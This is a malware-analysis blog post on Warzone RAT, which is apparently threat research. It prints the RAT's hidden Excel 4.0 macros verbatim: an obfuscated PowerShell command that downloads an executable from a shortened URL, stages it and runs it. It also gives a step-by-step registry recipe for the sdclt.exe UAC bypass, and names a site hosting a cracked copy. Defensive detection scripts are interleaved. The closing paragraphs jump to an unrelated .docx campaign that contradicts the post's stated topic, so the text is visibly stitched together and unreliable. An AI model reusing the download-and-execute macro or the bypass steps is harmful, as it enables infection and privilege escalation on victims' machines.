WarZone Rat Is FUD Bypass Antivirus

The research team identified an XLS document that downloaded a highly vicious payload named Warzone RAT. The payload, also known as "Ave Maria stealer," can steal credentials and log keystrokes on the victim's machine. Check Point mentioned WarZone early this year when the malware was in its early stage of development.

The latest version of the malware is fully developed and is being sold in the underground market. The Warzone authors have an official website where cybercriminals can buy the malware.

The Warzone developers rent out several products on their website:

  • RAT
  • RAT Poison
  • Crypter
  • SILENT.doc exploit
  • SILENT EXCEL Exploit

Here are various features of the RAT noted on the website:

  • Native, independent stub
  • Remote Desktop
  • Hidden Remote Desktop – HRDP
  • Privilege Escalation – UAC Bypass
  • Remote WebCam
  • Password Recovery
  • File Manager
  • Download & Execute
  • Live Keylogger
  • Offline Keylogger
  • Remote Shell
  • Process Manager
  • Reverse Proxy
  • Automatic Tasks
  • Mass Execute
  • Smart Updater
  • HRDP WAN Direct Connection
  • Persistence
  • Windows Defender Bypass

We also discovered a cracked version of Warzone hosted on www.masterscyber.com.

The instance of WarZone RAT we captured has the ability to bypass UAC on the latest version of Windows 10. In this blog we're going to talk about the XLS used as the attack vector and the UAC bypass technique the payload uses.

The malicious XLS

The XLS used in the attack uses Excel 4.0 macros, also known as XLM macros. The XLM macro feature has been part of Microsoft Excel for a long time, but we've seen a spike in its malicious usage for a few months now. Malware authors exploit this feature of Excel, which lets macro instructions be written as ordinary cell formulas.

When we got hold of the XLS on November 11, only a few of the anti-malware vendors could detect it on Virustotal (see figure 3).

In the XLS file, the macros are implemented as formulas in a hidden sheet and are not visible when the XLS is opened. The macros become visible only after unhiding the sheet. The following screenshot shows the unhidden sheet with macro code embedded in the formulas.

Here’s the macro code in respective rows and columns:

  • Row 596 column E – =CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&"powe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile').""""Invoke""""('https://cutt.ly/agJgRCy','gm.exe')"
  • Row 597 column E – =CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&"powe^rshell -w 1 stARt`-slE`Ep 20; Move-Item ""gm.exe"" -Destination ""${enV`:appdata}"""
  • Row 598 column E – =CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&"powe^rshell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./gm.exe"

These macros are responsible for downloading and executing the Warzone RAT. The Warzone payload takes full control of the system after bypassing UAC and then steals information and monitors the victim’s machine.
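The three formulas above hide a plain "cmd /c powershell" chain behind CHAR() concatenation, cmd.exe carets and PowerShell backticks. The following is an added example (not code from the original post) of how a sheet scanner can undo exactly those tricks and then apply keyword rules to the result. The sample cells are constructed to mirror the quoted formulas, with the download URL replaced by a placeholder and a benign formula added for contrast; the indicator names are the author's own.

```python
import re

# Constructed sample cells modelled on the quoted formulas (placeholder URL, plus one benign cell).
SAMPLE_FORMULAS = {
    "E596": r'''=CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&"powe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile').""""Invoke""""('https://example.invalid/stage2','gm.exe')"''',
    "E597": r'''=CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&"powe^rshell -w 1 stARt`-slE`Ep 20; Move-Item ""gm.exe"" -Destination ""${enV`:appdata}"""''',
    "E598": r'''=CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&"powe^rshell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./gm.exe"''',
    "A1": r'''=CHAR(72)&"ello"''',
}

# Keyword rules applied to the normalized command (names chosen for this example).
INDICATORS = {
    "cmd_to_powershell": r"\bcmd\s*/c\s*powershell",
    "hidden_window": r"-w(?:indowstyle)?\s+(?:1|hidden)\b",
    "download_cradle": r"net\.webclient|downloadfile|downloadstring",
    "delayed_execution": r"start-sleep",
    "appdata_staging": r"env:appdata",
    "remote_url": r"https?://",
    "runs_dropped_file": r"\./\S+\.exe\b",
}


def evaluate_concat_formula(formula: str) -> str:
    """Evaluate an XLM formula built only from CHAR(n), string literals and '&'.

    Excel doubles a quote inside a string literal to represent one literal quote.
    """
    s = formula.lstrip("=")
    out, i, n = [], 0, len(s)
    while i < n:
        c = s[i]
        if c == '"':                      # string literal
            i += 1
            buf = []
            while i < n:
                if s[i] == '"':
                    if i + 1 < n and s[i + 1] == '"':
                        buf.append('"')
                        i += 2
                        continue
                    i += 1
                    break
                buf.append(s[i])
                i += 1
            out.append("".join(buf))
        elif s[i:i + 5].upper() == "CHAR(":
            j = s.index(")", i)
            out.append(chr(int(s[i + 5:j])))
            i = j + 1
        elif c in "& \t":                 # concatenation operator and whitespace
            i += 1
        else:
            raise ValueError(f"unsupported token at offset {i}: {c!r}")
    return "".join(out)


def normalize_command(cmd: str) -> str:
    """Undo the cheap escape-character obfuscation so keyword rules can match."""
    cmd = cmd.replace("^", "")   # cmd.exe escape char, used only to split 'powershell'
    # PowerShell's escape char; stripping it also flattens `n/`t inside strings,
    # which is acceptable here because we only want keywords to line up again.
    cmd = cmd.replace("`", "")
    # Fold 'Down'+'loadFile' style string splitting back into one literal.
    cmd = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", cmd)
    return cmd


def analyze_formula(formula: str) -> dict:
    decoded = evaluate_concat_formula(formula)
    normalized = normalize_command(decoded)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, normalized, re.I)]
    return {"decoded": decoded, "normalized": normalized,
            "indicators": hits, "suspicious": len(hits) >= 2}


def analyze_sheet(cells: dict) -> list:
    """Return (cell, result) pairs for every cell that trips two or more rules."""
    return [(cell, r) for cell, f in cells.items()
            if (r := analyze_formula(f))["suspicious"]]


if __name__ == "__main__":
    for cell, result in analyze_sheet(SAMPLE_FORMULAS):
        print(cell, result["indicators"])
        print("   ", result["normalized"])
```

Requiring two rule hits keeps a lone "https://" or "-w 1" in a legitimate sheet from firing; the three staged cells each trip four or five rules while the benign cell trips none.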

Here’s the flow of the attack:

  • The macro in the XLS file uses PowerShell to download and execute gm.exe, which is the Warzone RAT.
  • Gm.exe bypasses UAC to run at high integrity level.
  • Gm.exe copies itself to %programdata% with the name Images.exe and then executes it. Images.exe runs at high integrity level.

The image below describes the flow of the attack.

The flow of attack.

The Warzone RAT payload: Win over the UAC

The Warzone RAT (gm.exe) is a 32-bit application and uses sdclt.exe to bypass UAC and run at higher privileges. Sdclt.exe is a built-in Windows utility used for backup and restore purposes. Sdclt is designed to auto-elevate its privilege and uses the control panel binary, control.exe, to back up and restore control panel settings.

Many UAC bypass techniques are not effective when launched from a 32-bit process on 64-bit Windows 10 because of WOW64 file system redirection: a 32-bit application that tries to access the native c:\windows\system32 directory has the request transparently redirected to c:\windows\SysWOW64. Sdclt.exe and the other binaries commonly abused for UAC bypass are 64-bit applications and have no copy in the SysWOW64 directory.

However, the operating system provides a mechanism to turn this redirection off for the calling thread: the Wow64DisableWow64FsRedirection API. Warzone calls Wow64DisableWow64FsRedirection so that it can reach the sdclt.exe that resides in the real system32 directory (see figure 6, below).

After disabling the redirection, the malware makes the following registry changes:

  • Creates a new registry key HKCU\Software\Classes\Folder\shell\open\command
  • Sets the (Default) value of that key to the path of the malware
  • Creates a value named "DelegateExecute" and sets it to "0"
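Because HKCU\Software\Classes is writable by an unprivileged user and shadows the machine-wide class definitions, the key above does not exist on a clean system, so its presence is a cheap detection. The following is an added example (not code from the original post) that parses a .reg-style export and flags it. It generalizes slightly beyond the post: any HKCU\Software\Classes\<class>\shell\open\command key is reported, and the combination of a DelegateExecute value with a command outside C:\Windows is rated highest. The export text is constructed for the example, the victim path is a placeholder, and the live-host helper is the author's own addition that only works on Windows.

```python
import re
import sys

# Constructed .reg export (not from the original post): the three changes described
# above, plus one unrelated, legitimate-looking key for contrast.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\.txt]
@="txtfile"

[HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command]
@="C:\\Users\\victim\\AppData\\Roaming\\gm.exe"
"DelegateExecute"="0"
"""

# Any per-user <class>\shell\open\command key overrides the HKLM definition of that
# class; for the Folder class it is the one sdclt.exe ends up resolving via control.exe.
HIJACK_KEY = re.compile(
    r"^HKEY_CURRENT_USER\\Software\\Classes\\[^\\]+\\shell\\open\\command$", re.I)
SYSTEM_PREFIXES = ("c:\\windows\\", "%systemroot%\\")


def parse_reg_export(text: str) -> dict:
    """Parse the subset of .reg syntax used above: [key] headers, @= defaults, "name"="str" values."""
    hive, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            hive[current] = {}
            continue
        m = re.match(r'^(@|"(?P<name>[^"]*)")=(?P<val>.*)$', line)
        if m and current is not None:
            name = "" if m.group(1) == "@" else m.group("name")   # "" is the (Default) value
            val = m.group("val")
            if val.startswith('"') and val.endswith('"'):
                val = val[1:-1].replace('\\\\', '\\').replace('\\"', '"')
            hive[current][name] = val
    return hive


def find_shell_command_hijacks(hive: dict) -> list:
    """Report every per-user shell\\open\\command override and how suspicious it looks."""
    findings = []
    for key, values in hive.items():
        if not HIJACK_KEY.match(key):
            continue
        command = values.get("", "")
        has_delegate = "DelegateExecute" in values   # presence matters, not its content
        outside_system = not command.lower().lstrip('"').startswith(SYSTEM_PREFIXES)
        severity = "high" if has_delegate and outside_system else "medium"
        findings.append({"key": key, "command": command,
                         "delegate_execute": has_delegate, "severity": severity})
    return findings


def check_live_registry():
    """On Windows, read the Folder\\shell\\open\\command key from the live HKCU hive.

    Returns None on other platforms, [] when the key is absent (the clean state),
    and a findings list otherwise.
    """
    if sys.platform != "win32":
        return None
    import winreg
    path = r"Software\Classes\Folder\shell\open\command"
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as k:
            values, i = {}, 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(k, i)
                except OSError:
                    break
                values[name] = data
                i += 1
            return find_shell_command_hijacks({"HKEY_CURRENT_USER\\" + path: values})
    except FileNotFoundError:
        return []


if __name__ == "__main__":
    for f in find_shell_command_hijacks(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f["severity"].upper(), f["key"], "->", f["command"],
              "(DelegateExecute present)" if f["delegate_execute"] else "")
    print("live host:", check_live_registry())
```

Run against a `reg export HKCU\Software\Classes` dump from a suspect host, the function lists only the overriding keys; on a clean profile the live check returns an empty list, which is the expected baseline worth alerting on when it changes.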

The Warzone RAT can steal passwords from the following browsers:

  • Google Chrome
  • Epic Privacy Browser
  • Microsoft Edge
  • Opera
  • Tencent QQ Browser
  • Brave Browser
  • CenterBrowser
  • Blisk
  • Torch Browser
  • Slimjet browser

It steals the passwords that are stored in the browsers' credential databases. A screenshot in the original post shows the SQL query the malware uses to extract the saved credentials from the browser database.

Here are some more strings that can be used to identify and detect the unpacked Warzone payload inside memory:

  • warzone160
  • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
  • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe

Malware authors are always hunting for techniques that can bypass security. As mentioned earlier, the UAC bypass technique used by Warzone works on the latest version of Windows 10. We are seeing an increase in usage of the technique. In our intelligence database we have encountered some additional malware that uses the same technique to bypass UAC. Below is a screenshot (figure 15) of VBA macro code found in an .xlsm sample (SHA256: 70d400cbacc02f2417e742608c626c52698b07a42de3eb6e1ff4fea17d5bc0b6) that calls the same Wow64DisableWow64FsRedirection API.

Warzone RAT is part of an APT campaign named "Confucius." Confucius APT is known to target government sectors of China and a few other South Asian countries. This APT campaign was quite active around January 2021. Warzone RAT first emerged in 2018 as malware-as-a-service (MaaS) and is known for its aggressive use of ".docx" files as its initial infection vector. The initial payload is known as "Ave Maria Stealer," which can steal credentials and log keystrokes on the victim's machine. The advanced version of this malware is currently sold in the underground market for $22.95 per month and $49.95 for three months. The Warzone creators have an official website where it's up for sale.

Based on our research, we confirmed that the threat actor is trying to evade detection with a decoy document and manipulate users, delivering the next-stage payload via the template injection technique. In this blog, we are going to talk about the ".docx" used as an initial attack vector and how it delivers its final payload, Warzone RAT.
